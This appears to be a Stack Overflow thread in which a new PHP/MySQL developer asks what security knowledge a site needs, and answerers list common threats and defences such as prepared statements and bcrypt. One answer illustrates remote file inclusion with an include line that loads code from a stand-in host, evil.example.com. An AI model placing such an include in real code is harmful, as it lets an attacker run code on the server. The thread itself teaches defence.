# How much web security knowledge do I need before I can publish my site?

Tags: php, mysql, security, sql-injection

I'm coding my first php/mysql site and realize that I know very little about security beyond what I learned in my course/book. How much security knowledge do I need before I can publish my own site without being concerned that achieving even modest success will draw hackers and lead to my site being broken into?

If it helps with more specifics, I'm creating a site that will allow users to add plain text content, as well as browse what others have added. The text is meant to be stored in a db.

Comment: "How to secure my web application" is to large of a scope to answer.  Basics: use prepared sql statements, don't use a quick hash to store a password, use `bcrypt` or similar.

Comment: Firstly you should head over to https://www.owasp.org/index.php/Category:Attack if you are reading from a course/book then your are most likely vulnerable to something (SQL injection, XSS) as most of them books do not implement security as it can confuse a learner.

Comment: @Jon what is a quick hash as opposed to a non-quick hash? I was thinking to use sha-512 from what I read. Should I use bcrypt instead and if so, can you explain why, please?

Comment: @LawrenceCherone I read some of those articles now, so thanks for sharing. It teaches about a variety of attacks,  n I don't know how many nor which are relevant for me to build protections against. For example, the man-in-the-middle attack is based on LAN vulnerability, and outside my control, if I understood correctly.

Comment: @gabrielg using a quick hash (ie, any true 'hash' method, including sha-512) is easy to replicate with computer's now.  bcrypt offers a solution that both salts the password and is slow. For more reference look at: http://phpmaster.com/why-you-should-use-bcrypt-to-hash-stored-passwords/ and http://problog.jon-lawrence.com/2012/08/a-little-about-passwords/

Answer (score 3):

You cannot know everything, so it depends on what possible attack vectors your code has and what the risks are.

**Ask yourself:**

- **Do I include or read files based on user input?** Then you should know, why white-listing is important and what the risks of stream wrappers are (i.e. `include 'http://evil.example.com/hack.txt';`). See: [PHP - Is "include" function secure?](https://stackoverflow.com/questions/10148328/php-is-include-function-secured/10148413#10148413)
- **Do I output user generated content or content based on user input?** Then you should know what [XSS](http://en.wikipedia.org/wiki/XSS) (Cross Site Scripting) is and how to prevent it
- **Do I use dynamic SQL queries?** Then you should know what [SQL Injections](http://en.wikipedia.org/wiki/SQL_injection) are and how to prevent them. Side note: Don't use the `mysql_` functions anymore. See: [The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead](https://stackoverflow.com/questions/13944956/the-mysql-extension-is-deprecated-and-will-be-removed-in-the-future-use-mysqli)
- **Do I use sessions?** Then you should know what [Session Hijacking](http://en.wikipedia.org/wiki/Session_hijacking) is and how to prevent it.
- **Do I use file uploads?** Then you should know about [securing file uploads](http://www.net-security.org/dl/articles/php-file-upload.pdf) (PDF link)
- **Do I handle user passwords?** Then you should know about state-of-the-art password hashing, namely bcrypt. See: [How do you use bcrypt for hashing passwords in PHP?](https://stackoverflow.com/questions/4795385/how-do-you-use-bcrypt-for-hashing-passwords-in-php)
- **Do I use user-specific forms?** Then you should know about [CSRF](http://en.wikipedia.org/wiki/CSRF) (Cross Site Request Forgery) and how to prevent it
- **Do I use form that send mails?** Then you should know about [Email Injection](http://en.wikipedia.org/wiki/Email_injection) or use a library that you know is secured against it, like [swiftmailer](http://swiftmailer.org/docs/headers.html).
- **Do I use any form at all?** Then don't use `PHP_SELF` as its action, because [XSS is also a possible attack on $_SERVER variables](https://stackoverflow.com/a/13248255/664108).

*this list is not complete but should cover the most common use cases for simple web applications and their security threats*

**Regarding risk:**

As soon as you handle sensible personal data of users or host the site on your own virtual server, you have additional responsibilities because the worst case is not anymore just that your site could be broken, but private data could be exposed, your server could transform into a spambot or worse.

The most important rule is: **DON'T TRUST ANY INCOMING DATA**

An extension to this rule, **important for beginners**: Use exactly the measures that fit the current context. DO NOT JUST THROW EVERYTHING AT THE USER INPUT THAT YOU KNOW AND HOPE IT WILL BE MORE SECURE, this is **counterproductive**! I often see questions like: "Is my application secure if I use `addslashes(mysql_real_escape_string(strip_tags(htmlspecialchars())))` on all my $_POST variables?" - if you even consider this a valid approach, you have a serious misunderstanding of how security regarding user input works. I repeat: **what's secure and what not, always depends on the context!**

A great resource to learn from is the **[Open Web Application Security Project](https://www.owasp.org/)**

Comment: Fab that was excellent and helps me understand what direction to go with my learning. I really really appreciate the time you took to write out all that detail and if I could vote up your answer I would! I especially like the If 'issue' then learn 'solution' format!

Answer (score 2):

It's never enough. But you will hopefully keep improving. And probably when you'll be ready, you'll know yourself.

Learn the most common security issues, such as:

- Sql Injections
- Form spoofing
- XSS

and remember to:

- always valide user input (including sessions)
- block access to folders that shouldn't be public
- to use blowfish instead of md5/sha1 for passwords
- hide errors to the end user (and log them)

Also take a look at [this guide](http://phpsec.org/projects/guide/) which sums up the most famous security problems.

Comment: Jeffrey that was really useful - a clear answer to where I should direct my attention. I can't yet vote up answers but I'd vote yours up if I could. Thanks for helping a newb!

Also, that guide is excellent - I'm very grateful for the link!

Answer (score 1):

Take a look into SQL injections and XSS. It is all in validating a users input. Never trust a user.

[SQL Injections](http://en.wikipedia.org/wiki/SQL_injection)

[XSS](http://en.wikipedia.org/wiki/Cross-site_scripting)

Last the best way to learn is suffer from an attack because of bad security. Then you understand how it works. Just one tip, make backups.

Comment: Thanks s.lenders - I'll go read those Wikipedia articles n see what I learn! :)

Answer (score 0):

The most critical in your website would be that the users can provide text to your database.
Read this question here on stackoverflow for a good answer on how to prevent sql injection.
[How to prevent sql injection in php](https://stackoverflow.com/questions/60174/how-to-prevent-sql-injection-in-php)

Comment: Yeah, good point - we discussed sql injections in class, so I'll look into these more as you and s.lenders pointed out! Thankyou for helping me!